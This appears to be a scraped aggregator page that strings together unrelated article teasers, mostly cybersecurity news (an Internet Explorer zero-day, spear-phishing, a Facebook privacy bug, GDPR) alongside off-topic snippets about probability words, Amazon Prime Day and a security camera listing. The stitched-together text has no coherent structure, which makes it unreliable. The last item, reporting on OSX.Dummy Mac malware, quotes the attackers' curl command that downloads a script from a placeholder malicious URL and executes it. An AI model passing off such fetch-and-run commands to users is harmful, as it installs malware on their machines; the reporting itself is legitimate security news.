Cloud hacks are becoming increasingly more prominent and problematic – a concerning trend, especially in light of the fact that individuals, companies and institutions are relying on cloud technology now more than ever to keep their data secure.
In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object.
People use imprecise words to describe the chance of events all the time — “It’s likely to rain,” or “There’s a real possibility they’ll launch before us,” or “It’s doubtful the nurses will strike.” Not only are such probabilistic terms subjective, but they also can have widely different interpretations. One person’s “pretty likely” is another’s “far from certain.” Our research shows just how broad these gaps in understanding can be and the types of problems that can flow from these differences in interpretation.
Have you ever been in a situation where multiple adults are attempting to solve a problem, but a small child is the only voice of reason in the room? Children often lack a filter — and have a unique type of wisdom that can only stem from a young person’s perspective of the world. Why can’t we harness these powers for the business world?
Since its inception, mobile device management (MDM) has been a simple way to ensure that devices used for corporate purposes stay within policy guidelines. It was cut and dried: If you could locate, lock and wipe devices, you were all set.
In June’s cybersecurity news, the cyberskills gap is growing and social engineering schemes like phishing attacks remain a top threat vector — especially during high-profile events such as the World Cup.
An Iranian cyber-espionage group attempted to pose as one of the cyber-security firms that exposed its previous hacking campaigns in an effort to spear-phish people interested in reading reports about it.
Facebook has notified 800,000 users whose privacy has been compromised by a “blocked” bug. It appears that blocked individuals on Facebook and Messenger of the affected users were temporarily unblocked. Facebook also has some new API restrictions aimed at protecting user information more efficiently.
The ever evolving threat landscape in our ecosystem demands that we put some thought into the security controls that we use to ensure we keep the bad guys away from our data. This is where software development lifecycle (SDLC) security comes into play. Organizations need to ensure that beyond providing their customers with innovative products ahead of the competition, their security is on point every step of the way throughout the SDLC.
By 2020, the very foundations of today’s digital world will shake. Nation states and terrorist groups will increasingly weaponize the cyber domain, launching attacks on critical national infrastructure that cause widespread destruction and chaos. With power, communications and logistics systems down, organizations will lose the basic building blocks needed for doing business. Heating, air conditioning, lighting, transport, information, communication and a safe working environment will no longer be taken for granted.
The rapid evolution of technology and, in particular, the Industrial Internet of Things (IIoT) is transforming critical environments, bringing benefits such as optimised processes, reduced costs and energy efficiencies. The maritime industry, which forms part of our critical infrastructure, is adapting to access many of the benefits that innovation in technology can offer. By the end of the decade, for example, a new era of shipping will have started with the world’s first autonomous container ship transporting goods around the coastline of Norway.
Amazon’s Prime Day, the company’s annual sales event that’s now its biggest, will be held this year on July 16, starting at 12 PM PT/3 PM ET, the retailer announced today. One big change this time around is the event’s length — last year, Prime Day ran 30 hours, but this year’s event will run for 36 hours. In addition to being the longest Prime Day to date, the event will also expand to new markets this year, says Amazon.
An alphabet soup of federal agencies are now poring over Facebook’s disclosures and the company’s statements about its response to the improper use of its user information by the political consultancy Cambridge Analytica.
With the GDPR deadline now passed, the sigh of relief from IT departments up and down the country was almost audible. IT teams were thrown the challenge of working out what was needed to meet the GDPR guidelines as it was thought to be a security issue. It swiftly became apparent, however, that it was a people and process issue and not a technology one. So IT passed the buck on to the legal, HR and finance departments. But as companies gained a handle on the policies and procedures they needed it quickly became apparent the IT department would be required again.
Cybercriminals looking to make a profit are turning their attention towards an industry known for housing sensitive consumer data with weak security protocols: healthcare.
The U.S. Air Force’s recently departed Chief Information Security Officer Peter Kim joined the military contracting giant Raytheon as its director of IT security and governance at the company’s subsidiary Raytheon Missile Systems, CyberScoop has learned.
The Department of Justice’s internal “Cyber-Digital Task Force,” created by Attorney General Jeff Sessions in February, will release its first-ever public report later this month at the Aspen Institute’s annual Security Forum, a department spokesperson told CyberScoop.
LaView 1080P Wi-Fi 360° Indoor Security Camera, Remote Pan Tilt Camera with Micro SD On-Board Storage, Two-Way Audio, Night Vision Surveillance, Motion Detection, Remote View – 16GB SD Card Included
Last week, a security researcher named Remco Verhoef announced the discovery of a new piece of Mac malware being distributed on cryptomining chat groups. This malware was later further analyzed by Patrick Wardle, who gave it the rather appropriate moniker OSX.Dummy.
The malware was being distributed by chat users posing as admins, who posted the following shell script for users to run:
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script